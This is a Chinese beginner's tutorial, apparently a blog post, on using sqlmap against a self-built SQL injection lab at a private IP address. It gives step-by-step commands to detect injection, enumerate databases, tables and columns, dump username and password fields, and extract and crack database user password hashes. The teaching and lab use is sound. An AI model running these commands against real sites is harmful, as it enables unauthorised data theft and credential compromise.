sqlmap的使用—初级

1.实验环境:自建sql注入靶场。
2.使用。
(1)判断是否存在注入点。
py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1
(2)当注入点后面的参数大于等于两个时,需要加双引号。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1&uid=2"
(3)判断文本中的请求是否存在注入,从文件中加载HTTP请求,SQLMap可以从一个文本文件中获取HTTP请求,这样就可以不设置其他参数(如cookie、POST数据等),txt文件中的内容为Web数据包,如下所示:
文件名:1.txt

GET /Less-1/?id=1 HTTP/1.1
Host: 192.168.171.128:1235
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=733c3f6d-408f-40b0-9514-62afccee5b8f.LeeN9kulMUTmh-VZO5hZkKn8PLM; PHPSESSID=s11uo1s4ce83qeokoi79b2d8j5; security=impossible

判断是否存在注入的命令如下所示,运-r一般在存在cookie注入时使用。

py2 sqlmap.py -r 1.txt
(4)该命令是确定网站存在注入后,用于查询当前用户下的所有数据库,如下所示。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有数据库。
py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1 -dbs
(5)-dbs缩写成-D xxx,其意思是在xxx数据库中继续查询其他数据。
py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1 -D xxx
(6)获取数据库中的表名:该命令的作用是查询完数据库后,查询指定数据库中所有的表名,如下所示。如果在该命令中不加入-D参数来指定某一个具体的数据库,那么SQLMap会列出数据库中所有库的表。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" -D dvwa --tables
(7)获取表中的字段名:该命令的作用是查询完表名后,查询该表中所有的字段名,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" -D dvwa -T users --columns
(8)获取字段内容:该命令是查询完字段名之后,获取该字段中具体的数据信息,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" -D dvwa -T users -C user,password --dump
(9)获取数据库的所有用户:该命令的作用是列出数据库的所有用户,如下所示,在当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --users
(10)获取数据库用户的密码:该命令的作用是列出数据库用户的密码,如下所示。如果当前用户有读取包含用户密码的权限,Sqlmap会先列举出用户,然后列出Hash,并尝试破解。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --passwords
(11)获取当前网站数据库的名称:使用该命令可以列出当前网站使用的数据库,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --current-db
(12)获取当前网站数据库的用户名称:使用该命令可以列出当前网站使用的数据库用户,如下所示。
py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1" --current-user
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晶晶娃在战斗

你的鼓励将是我创作的最大动力!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值